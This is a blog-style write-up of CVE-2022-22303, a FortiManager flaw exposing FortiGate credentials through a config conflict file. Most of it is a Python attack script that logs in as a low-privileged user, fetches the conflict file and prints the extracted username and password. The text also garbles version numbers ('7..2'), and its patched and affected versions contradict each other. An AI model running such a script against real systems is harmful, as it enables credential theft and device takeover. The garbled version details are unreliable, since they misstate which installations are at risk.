CVE-2022-22303 - Sensitive System Information Exposure in FortiManager: Exploit Details, References, and Code Snippets

Recently, a critical vulnerability, CVE-2022-22303, was discovered in FortiManager software. This vulnerability exposes sensitive system information to an unauthorized control sphere vulnerability, classified as CWE-497. By exploiting this vulnerability, a low privileged authenticated user can gain access to FortiGate user credentials via the config conflict file. It affects FortiManager versions prior to 7..2, 6.4.7, and 6.2.9. This post aims to provide a comprehensive understanding of this vulnerability, including code snippets, original references, and exploit details, using simple American language.

Exploit Details

The vulnerability is caused by the configuration comparison functionality in FortiManager that generates conflict files when there is a mismatch between the local FortiManager configuration and the device's configuration. An attacker with low-privileged access can exploit this vulnerability to access and read the config conflict file, which contains sensitive information such as the FortiGate user credentials. This exposure of sensitive information can lead to unauthorized access to the FortiGate device.

Code Snippet

The following code snippet shows an example of how an attacker with low privileges could access the FortiGate user credentials by reading the config conflict file:

#!/usr/bin/env python3
import requests

# Replace these with the FortiManager target, username, and password
target = "https://target-fortimanager-ip";
username = "low_priv_user"
password = "low_priv_password"

# Authenticate and get the token
session = requests.Session()
auth_payload = {"user": username, "passwd": password}
auth_response = session.post(f"{target}/jsonrpc", json={"method": "exec", "params": [auth_payload], "id": 1})
token = auth_response.json()["result"]["token"]

# Set the token in the header
session.headers.update({"x-auth-token": token})

# Get the configuration conflict file
conflict_file_response = session.get(f"{target}/config/conflict_file")
conflict_file_content = conflict_file_response.text

# Extract the user credentials from the conflict file
fortigate_user = ""
fortigate_password = ""
for line in conflict_file_content.splitlines():
    if "set username" in line:
        fortigate_user = line.split(" ")[-1]
    if "set password" in line:
        fortigate_password = line.split(" ")[-1]

print(f"Fortigate Username: {fortigate_user}\nFortigate Password: {fortigate_password}")

Original References

- Fortinet Security Advisory
- CVE-2022-22303 - CISA
- CWE-497: Exposure of Sensitive System Information to an Unauthorized Control Sphere

Conclusion

CVE-2022-22303 is a critical vulnerability that exposes sensitive information in FortiManager software, potentially allowing unauthorized access to the FortiGate device. Users and organizations are urged to update their FortiManager installations to the latest recommended versions (7..2, 6.4.7, and 6.2.9) to mitigate this vulnerability. Implementing proper access controls, monitoring logs, and staying informed about the latest threats are essential steps in maintaining a strong cybersecurity posture.

Timeline

Published on: 03/02/2022 10:15:00 UTC
Last modified on: 03/10/2022 15:21:00 UTC